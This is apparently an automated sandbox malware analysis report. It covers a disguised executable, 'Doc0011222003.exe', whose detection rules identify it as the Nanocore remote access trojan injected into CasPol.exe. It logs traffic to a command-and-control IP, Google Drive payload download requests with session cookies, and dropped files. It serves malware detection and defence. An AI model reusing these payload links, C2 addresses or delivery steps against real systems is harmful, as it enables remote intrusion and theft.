            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: unknownTCP traffic detected without corresponding DNS query: 79.134.225.122
            Source: CasPol.exe, 0000000D.00000003.78992434114.0000000001570000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79969192260.00000000010B9000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 0000000D.00000003.78992434114.0000000001570000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79969192260.00000000010B9000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000017.00000003.79782611527.00000000011D3000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmpString found in binary or memory: http://www.google.com/support/accounts/answer/151657?hl=en
            Source: CasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://csp.witN
            Source: CasPol.exe, 0000000D.00000003.78164216703.0000000001574000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79779831865.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000003.79901056457.0000000001137000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 0000000D.00000003.78164216703.0000000001574000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79779831865.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 0000001B.00000003.79901056457.0000000001137000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-68-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-68-docs.googleusercontent.com/%%doc-00-68-docs.googleusercontent.com
            Source: CasPol.exe, 0000000D.00000003.78460048091.0000000001535000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-68-docs.googleusercontent.com/0
            Source: CasPol.exe, 0000000D.00000003.78164216703.0000000001574000.00000004.00000001.sdmpString found in binary or memory: https://doc-00-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn
            Source: CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/
            Source: CasPol.exe, 0000001B.00000002.79969642742.0000000001120000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/%%doc-04-3g-docs.googleusercontent.com
            Source: CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/7
            Source: CasPol.exe, 00000017.00000002.79854564800.00000000011AB000.00000004.00000020.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/P
            Source: CasPol.exe, 0000001B.00000003.79904434041.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9n
            Source: CasPol.exe, 0000001B.00000003.79901056457.0000000001137000.00000004.00000001.sdmpString found in binary or memory: https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4t
            Source: CasPol.exe, 00000017.00000003.79788745751.00000000011C1000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
            Source: CasPol.exe, 00000017.00000003.79782467161.00000000011C1000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/lC
            Source: CasPol.exe, 00000017.00000003.79782611527.00000000011D3000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79788745751.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000003.79782467161.00000000011C1000.00000004.00000001.sdmp, CasPol.exe, 00000017.00000002.79854564800.00000000011AB000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleuserco
            Source: CasPol.exe, 00000017.00000002.79854189696.0000000001163000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79969192260.00000000010B9000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 0000001B.00000002.79968890359.0000000001077000.00000004.00000020.sdmp, CasPol.exe, 0000001B.00000002.79968686867.0000000000F40000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX
            Source: CasPol.exe, 0000000D.00000003.78164152939.0000000001570000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgXOvxQvyU_6Z1TC1nUE
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn9ga855bgu8d3ldr74vnelc1d/1637674800000/14482752613682931361/*/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-68-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-3g-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e%3Ddownload&hash=hqfbg0brbd0h8lf3lvpl1nnp6d5151ib HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download&nonce=s94nbloa4nc92&user=08866698715000929587Z&hash=ot9mkg4h11n1q8q8tl3fed9t5609m7ab HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-04-3g-docs.googleusercontent.comCookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0_nonce=s94nbloa4nc92
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
            Source: global trafficHTTP traffic detected: GET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-3g-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0=08866698715000929587Z|1637674950000|oi06qm5ps09ba9vtmvui6gpdeopbgkfu
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49821 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49840 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49843 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49845 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49846 version: TLS 1.2
            Source: CasPol.exe, 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

            E-Banking Fraud:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTR

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.CasPol.exe.1e163f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1e083f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Doc0011222003.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.CasPol.exe.1f189ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.CasPol.exe.1f18eadc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.2.CasPol.exe.1f0aeadc.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.CasPol.exe.1e163f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.CasPol.exe.1e163f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1e083f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.2.CasPol.exe.1e083f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.CasPol.exe.1f18eadc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1f0a9ca6.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.CasPol.exe.1f193105.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.2.CasPol.exe.1f0aeadc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.2.CasPol.exe.1f0b3105.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 00000017.00000002.79863339274.000000001E141000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000017.00000002.79863641955.000000001F141000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001B.00000002.79978855466.000000001F061000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000001B.00000002.79978540386.000000001E061000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: CasPol.exe PID: 6916, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: CasPol.exe PID: 7356, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_04C304B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_04C30938
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_204323A0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_20432FA8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_20433850
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 23_2_2043306F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_202E2FA8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_202E23A0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 27_2_202E306F
            Source: C:\Users\user\Desktop\Doc0011222003.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\AppData\Roaming\MAGTTEKNIK\PEGASUS.exeProcess Stats: CPU usage > 98%
            Source: Doc0011222003.exe, 00000002.00000000.76822478473.0000000000414000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameChalybes.exe vs Doc0011222003.exe
            Source: Doc0011222003.exe, 00000002.00000002.78193144135.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChalybes.exeFE2X vs Doc0011222003.exe
            Source: Doc0011222003.exe, 00000002.00000002.78193144135.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChalybes.exeFE2X> vs Doc0011222003.exe
            Source: Doc0011222003.exe, 00000002.00000002.78193144135.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChalybes.exeFE2XH vs Doc0011222003.exe
            Source: Doc0011222003.exe, 00000002.00000002.78193144135.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChalybes.exeFE2X= vs Doc0011222003.exe
            Source: Doc0011222003.exe, 00000002.00000002.78193144135.0000000002A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameChalybes.exeFE2XO vs Doc0011222003.exe
            Source: Doc0011222003.exeBinary or memory string: OriginalFilenameChalybes.exe vs Doc0011222003.exe
            Source: Doc0011222003.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Doc0011222003.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PEGASUS.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: PEGASUS.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Doc0011222003.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\backgroundTaskHost.exeSection loaded: edgegdi.dll
